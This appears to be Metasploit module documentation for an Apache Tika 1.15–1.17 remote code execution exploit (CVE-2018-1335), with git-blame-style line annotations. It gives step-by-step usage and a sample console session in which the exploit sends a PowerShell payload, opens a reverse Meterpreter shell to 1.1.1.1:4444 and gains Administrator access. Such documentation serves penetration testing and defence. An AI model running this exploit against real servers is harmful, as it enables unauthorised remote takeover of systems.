2019-03-28 22:05:05 -04:00
|
|
|
## Vulnerable Application
|
|
|
|
|
|
2019-07-30 16:55:06 -04:00
|
|
|
This module works against Windows installations of Apache Tika 1.15-1.17, and was successfully tested on
|
|
|
|
|
1.15-1.17. Apache Tika can be downloaded from [here](https://archive.apache.org/dist/tika/), and requires Java to be installed.
|
|
|
|
|
While the vulnerability is reported in more versions, exploitation was only successful against > 1.14 when jp2 was added as per
|
|
|
|
|
[this comment](https://github.com/rapid7/metasploit-framework/pull/11653#issuecomment-516159557).
|
2019-03-28 22:05:05 -04:00
|
|
|
|
|
|
|
|
Rhino Security Labs has an Excellent write-up describing this vulnerability. Find it on
|
|
|
|
|
[rhinosecuritylabs.com](https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/) or
|
|
|
|
|
[wayback](https://web.archive.org/web/20190314101650/https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/).
|
|
|
|
|
|
|
|
|
|
## Verification Steps
|
|
|
|
|
|
|
|
|
|
1. Install the application
|
|
|
|
|
2. Start msfconsole
|
|
|
|
|
3. Do: ```use exploits/windows/http/apache_tika_jp2_jscript```
|
|
|
|
|
4. Do: ```run```
|
|
|
|
|
5. You should get a shell.
|
|
|
|
|
|
|
|
|
|
## Scenarios
|
|
|
|
|
|
|
|
|
|
### 1.17 on Windows 2012 running as Administrator
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
resource (tika.rb)> use exploits/windows/http/apache_tika_jp2_jscript
|
|
|
|
|
resource (tika.rb)> set rhost 2.2.2.2
|
|
|
|
|
rhost => 2.2.2.2
|
|
|
|
|
resource (tika.rb)> set verbose true
|
|
|
|
|
verbose => true
|
|
|
|
|
resource (tika.rb)> check
|
|
|
|
|
[*] Apache Tika Version Detected: 1.17
|
|
|
|
|
[+] 2.2.2.2:9998 - The target is vulnerable.
|
|
|
|
|
resource (tika.rb)> run
|
|
|
|
|
[*] Started reverse TCP handler on 1.1.1.1:4444
|
|
|
|
|
[*] Powershell command length: 2278
|
|
|
|
|
[*] Sending PUT request to 2.2.2.2:9998/meta
|
|
|
|
|
[*] Sending stage (179779 bytes) to 2.2.2.2
|
|
|
|
|
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49313) at 2019-03-28 21:33:09 -0400
|
|
|
|
|
|
|
|
|
|
meterpreter > getuid
|
|
|
|
|
Server username: WIN-OBKF2JFCDKL\Administrator
|
|
|
|
|
meterpreter > getpid
|
|
|
|
|
Current pid: 1552
|
|
|
|
|
meterpreter > sysinfo
|
|
|
|
|
Computer : WIN-OBKF2JFCDKL
|
|
|
|
|
OS : Windows 2012 (Build 9200).
|
|
|
|
|
Architecture : x64
|
|
|
|
|
System Language : en_US
|
|
|
|
|
Domain : WORKGROUP
|
|
|
|
|
Logged On Users : 1
|
|
|
|
|
Meterpreter : x86/windows
|
|
|
|
|
```
|